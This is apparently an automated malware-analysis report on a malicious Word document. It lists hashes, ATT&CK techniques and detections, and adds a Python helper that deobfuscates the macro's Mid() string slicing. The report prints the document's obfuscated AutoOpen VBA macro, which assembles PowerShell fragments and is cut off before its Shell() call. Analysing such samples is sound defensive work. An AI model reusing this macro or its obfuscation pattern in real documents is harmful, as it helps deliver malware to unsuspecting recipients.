Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c20017909e991e7e…

MALICIOUS

Office (OLE)

Size: 132.0 KB
Created: 2018-02-09 06:56:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: e7b411ba54f2ea14b85f4ef67415c000
SHA-1: 4b11b4f4bb4a204b05b92c260fa4d0070bd6e250
SHA-256: c20017909e991e7e2d6ee57af7eca6367d1993b4668e1fc77d61e12315ae30f7
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a Word document whose VBA project contains an AutoOpen entry point in module IcrNnJOl. The visible source is padded with filler arithmetic on never-assigned variables under On Error Resume Next, so divide-by-zero and similar errors in the filler are swallowed and the lines contribute nothing. The real content is assembled from fixed-offset Mid() slices of long string literals whose random prefixes and suffixes defeat naive string scanning; the recovered slices contain PowerShell obfuscation idioms ([chAr]N+[chAr]M character assembly, -replace/.replace chains, foreach, try/catch with break) together with placeholder tokens (6m1, gbd, GOH) that a later step must substitute. AutoOpen hands control to Application.Run "wZBwHjC", passing the output of the assembling function fZjkQOudkdip(); the Shell() call flagged by the heuristics lies beyond the truncated preview. This is a typical macro-based delivery stage, likely intended to reconstruct and launch a command that downloads and runs a second-stage payload rather than to carry that payload itself.
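The slicing step can be reproduced directly. The following Python is an added example, not part of the report or of its analysis tooling: it emulates VBA's 1-based Mid() over Mid() assignment lines copied from the macros.bas preview in this report (constructed input, three of the seven visible assignments), recovers each variable's slice, and flags the PowerShell idioms found in it. The function and variable names and the regular expressions are the example's own; the final assembly order and the substitution of the placeholder tokens are decided by code outside the truncated preview, so the script deliberately stops at the slices.

```python
import re
from typing import Dict, List

# Constructed input: Mid() assignment lines copied from the macros.bas preview
# in this report. The "<var> = <junk> + Mid(...)" shape is what the script keys
# on; the filler arithmetic between them is omitted because it touches no string.
MACRO_EXCERPT = r'''
TGdifiDpI = jqBzpzi + Mid(("AwclEiOscwDoG6m1+6m1ngbd+gbd6mGOH+GOH1+6mGOH+GO'+'H1v:pu6m1+6m1b6m1+6m1lic + kDirQ6m1+6mNuJuwmhMiPoZaWpMChvm"), 14, 75)
kGqjKoj = ERLjmikKNLNYP + Mid(("ZsoKIjmPwsQCHUJtKPbtKdcYUYXqmNm1+6m1DiGOH+GOH+6m1+6m1k6m1+6m1D6m1+6m1tqS"), 31, 39)
mjbSK = PXnViwzw + Mid(("P1) -gbd+gbdrep'+'LACe ([Ch'+'aR]115+[ChaR]67+[GOH+GOHChgbd'+'+gbdaGZTkXpFnnTzqh"), 2, 67)
'''

# VBA shape:  <var> = <never-assigned name> + Mid(("<literal>"), <start>, <length>)
MID_ASSIGN = re.compile(
    r'^\s*(\w+)\s*=\s*\w+\s*\+\s*Mid\(\("([^"]*)"\),\s*(\d+),\s*(\d+)\)\s*$',
    re.MULTILINE,
)


def vba_mid(s: str, start: int, length: int) -> str:
    """Emulate VBA Mid(s, start, length): start is 1-based, and a length that
    runs past the end of the string is silently clipped, as VBA does."""
    if start < 1:
        raise ValueError("VBA Mid start must be >= 1")
    return s[start - 1 : start - 1 + length]


def extract_fragments(macro_src: str) -> Dict[str, str]:
    """Return {variable: recovered slice} for every Mid() assignment, in source order.
    The junk prefix and suffix of each literal fall outside the slice window."""
    out: Dict[str, str] = {}
    for var, literal, start, length in MID_ASSIGN.findall(macro_src):
        out[var] = vba_mid(literal, int(start), int(length))
    return out


def ps_markers(fragment: str) -> List[str]:
    """Flag PowerShell obfuscation idioms inside a recovered slice (triage aid only).
    The slices still carry placeholder tokens (6m1, gbd, GOH) that a later stage,
    not visible in the truncated preview, is expected to substitute."""
    checks = {
        # [chAr]115, [Ch'+'aR]67 ... : characters assembled from code points
        "char-code assembly": re.compile(r"\[ch(?:'\+')?ar\]\d+", re.I),
        # -replace / .replace chains, possibly split by '+' string concatenation
        "replace chain": re.compile(r"-?rep(?:'\+')?lace", re.I),
        "loop/exception control": re.compile(r"foreach|catch|break", re.I),
        # '+' inside a literal: PowerShell string concatenation used as noise
        "ps string concat noise": re.compile(r"'\+'"),
    }
    return [name for name, rx in checks.items() if rx.search(fragment)]


if __name__ == "__main__":
    for var, frag in extract_fragments(MACRO_EXCERPT).items():
        print(f"{var:12} len={len(frag):3} markers={ps_markers(frag)}")
        print(f"    {frag}")
```

Run it against the full macros.bas rather than this excerpt to recover all slices. The pattern keys on the exact `<var> = <junk> + Mid(("..."), start, length)` shape seen in this sample, so a variant that nests Mid() or Replace() differently needs the regular expression widened; the point is to let the macro's own offsets do the deobfuscation instead of guessing at the junk boundaries by eye.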

Heuristics 7

  • ClamAV: Doc.Trojan.Obfuscated-6444812-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Obfuscated-6444812-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The scanner describes this marker as evidence for the old Word macro execution surface when no modern VBA project is recovered, not as a downloader or parser-CVE attribution by itself. In this sample a VBA project was recovered (see Extracted artifacts below), so the marker adds nothing beyond the AutoOpen finding above and should not be counted as an independent indicator.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the DrawingML XML namespace URI that Office writes into drawing and OOXML parts; it is expected in benign documents, it is not a download or C2 location, and it should not be promoted to a network indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 24978 bytes
SHA-256: b9ad9506f1aac65641e8e800714dd854f57dfa2849f128b6deb1c27d9183c162
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IcrNnJOl"
Sub AutoOpen()
On Error Resume Next
uzmahhsmP = VuXGBVYfEm - sMvKHzJuIGiXk / (1274044 + czQvltpXvYpLt - 8637447 + aKbtCmrQZj)
isGTmWmzM = aOIAwDozmSmPB - fYwrEBkhqMDAi / (887351 + BCLjzuLB - 5215868 + wwrdHwSrSnOavv)
KIsYwzzUk = kPbjBtUWVwFDs - iPkJQRu / (5143856 + PVqBnEdw - 5859056 + AtrUjqYTr)
Application.Run "wZBwHjC", fZjkQOudkdip
FwpHQpphM = ESwKILNKsjRrz - psKquBTrzDV / (1649180 + OaMzXRIavE - 6731603 + JWfjmZOzPRYi)
wmLVMUtoz = wkjjtZrAuobH - inLLiHJKwChz / (7174992 + mNaKujX - 4504894 + zDfoHOXkDrBjhA)
End Sub
Function fZjkQOudkdip()
On Error Resume Next
TYnzYItEmww = fEOmzup - KZbUJlt / (6186483 + zPuDwZHqXGdmL - 467291 + AKZtDNOVKa)
dfBsjJhHt = WvMuvzVIsjo - iiHwZnMPzXBTwM / (9405 + aiujdQCLicK - 6069925 + CKqLMqOwR)
BoZLjoBnAw = hzKjztsvjzthJ - EUScvSzcjwwML / (1532194 + VlfJuNlSjDRl - 6298567 + hXUABHsXlAw)
TGdifiDpI = jqBzpzi + Mid(("AwclEiOscwDoG6m1+6m1ngbd+gbd6mGOH+GOH1+6mGOH+GO'+'H1v:pu6m1+6m1b6m1+6m1lic + kDirQ6m1+6mNuJuwmhMiPoZaWpMChvm"), 14, 75)
PWEnopC = SBjZijQBwbc - KAtwzfKC / (1629575 + GzQjBWNWKv - 7247637 + oqoMWRbDSk)
lLjiKIUEkw = bXjQPLiN - TzvkIvfu / (7620598 + QjakLDKnIsb - 1010491 + VrpLRFw)
SwkiotnO = bhYGqvDD - mhPqTbAnYNE / (4774177 + VlNwZsTjOo - 7862670 + pwBdUIGjh)
kGqjKoj = ERLjmikKNLNYP + Mid(("ZsoKIjmPwsQCHUJtKPbtKdcYUYXqmNm1+6m1DiGOH+GOH+6m1+6m1k6m1+6m1D6m1+6m1tqS"), 31, 39)
HnLimDWYu = ulCMntuVLkrXs - XiczJDFwprO / (8280320 + kXbfLVwuhm - 7255507 + kZmvwqiBO)
DowLih = XnoOpmwvKwwVK - jEjCwfqrqlZdSC / (8234177 + fpJwzor - 9304081 + JwlcnRPPnLu)
mnklRs = jFjzfwCp - TtEJSHLN / (9754044 + NjWnhEPDUKNirw - 8201121 + kazUroGTpFjSVK)
IkLRj = upLCQoYt + Mid(("cmizQ+kDie-Ite6m1'+'+GOHgbd+gbd+GOH6m1m6m1+6m1kDi)6m1+6m1(6m1+6m1TDdS6mGOH+GOH1+6m1'+'DC);break6gbd+gbd'+'m1gbd+gbd+6'+'m1;6m1+6m1}6mgbd+gbd1+gbd+gbd'+'6mGOH+GOH1catch{}6m1+6m1}6mpQIqqtFJIVNXD"), 6, 174)
iqpzZSGrsBL = sPthfwp - ISSWlOi / (841224 + cCzbXzhKGL - 8021247 + OQpSYGEzGbV)
iSbcZAUEi = DYzCnRo - LJzGUZVS / (2256624 + YnzbtCdENI - 4937753 + RBhzYzzf)
hiaXj = oWiPFSizwl - ljCiBciwZiEj / (7154946 + rwZXBVV - 6228239 + jQUMoku)
LDjRsA = CpQhaJS + Mid(("KJfOtjUZQmUojHJoCvlqnObpGnZk6m1+6gbd+gbdm1T6m1+6m1GOH+GOHDdns6Ggbd+gbdOH+GOHm1+6m1adasd.GOH+GOHngbd+gbde6m1goTAXjDYZj"), 29, 80)
fzwTW = UAGokqtKOWJazP - FjTRjPqMi / (5344250 + IzjIwZbEAUaLz - 4891332 + BZOljRHXPzf)
vMRTwXAq = PjiobMvhwaFX - wsOwfXTsFNQz / (8645522 + XBaUJSsLYWjwzD - 8365584 + bUqChZtakcL)
pqpSajEVoz = KSOqiRYjVFwFq - UsQjXQAamwHqM / (9535634 + zjjHDBFH - 8028289 + hfKJVXlLu)
mjbSK = PXnViwzw + Mid(("P1) -gbd+gbdrep'+'LACe ([Ch'+'aR]115+[ChaR]67+[GOH+GOHChgbd'+'+gbdaGZTkXpFnnTzqh"), 2, 67)
aiEOtvpZ = RisEaYWWPznl - kaRpkqRQY / (4280476 + SsGojcMOSYp - 1311686 + dElnzHnXIq)
AkOJiIl = kmOKwRQtM - miRhpnlY / (3744098 + uTtMfEiQRiIJB - 8180265 + uNBQAIw)
jndVSLUMjwI = LqWUFJUBwpAVRs - itmzbdE / (5567575 + bcvakIShzZiV - 1852686 + YHzhJTAUnBLX)
WlEvZlkE = AKDEvoj + Mid(("kiEplacE(gbd+gbd('+'[chAr]109+[chAr]gbd+gbd5gbd+gbd3+[chArgbd+gbd]119),[STrIgbd+gbdNG][chAr]124).rEp'+'lacE(([chAr]57+[chAr]'+'8g'+'bd+gbd0+[c'+'hAr]119),[dzcziVriwYKBiXkNR"), 3, 153)
UAVrv = QqWTYrJjUJOsiw - JjGpuONlEXcIbH / (3916857 + vtDQTzhwvrfCN - 9932813 + qUMEJmnTf)
JazalakDJ = FRvviiY - SSwbfbL / (9722216 + tCjLYFGm - 7762099 + DLFHZYNNf)
wlnvz = BMJGBujSOpls - cuRvshMo / (1603977 + TVpMLZDSNjMIjt - 5507886 + dYoYzdKA)
MrnvREsqiS = NJUQHNpsdN + Mid(("EXznjawNJVJHnsZrCZjsAvVwilCFMpfuThiQ1Wk6m1+'+'6m1Di 6m1+6m1+ 6m1+GOH+GOH6m1TD6m1+6m1dN6m1GO'+'H+GOH+6m1gbd+gbdSB + (kD6m1+6m1i.6m1+6m'+'1ex6GOH+GOHm1+6GOH+GOHm1kDi+kDie6m1+6m1k6m1+6m1Di)gbd+gbd;f6m1+6m1oreach(TDd6mBCG"), 37, 178)
YLtsPJL = hVtLWXMw - NYSjEoAkvp / (2164034 + jzQbzhNPPOCrw - 9106662 + vNcGzCJ)
abkpsmzwECr = kJlciwJXAaXwYc - ZpwiEzVbmIlF / (4403136 + jNlawjRMF - 6773892 + GrCQZziSd)
... (truncated)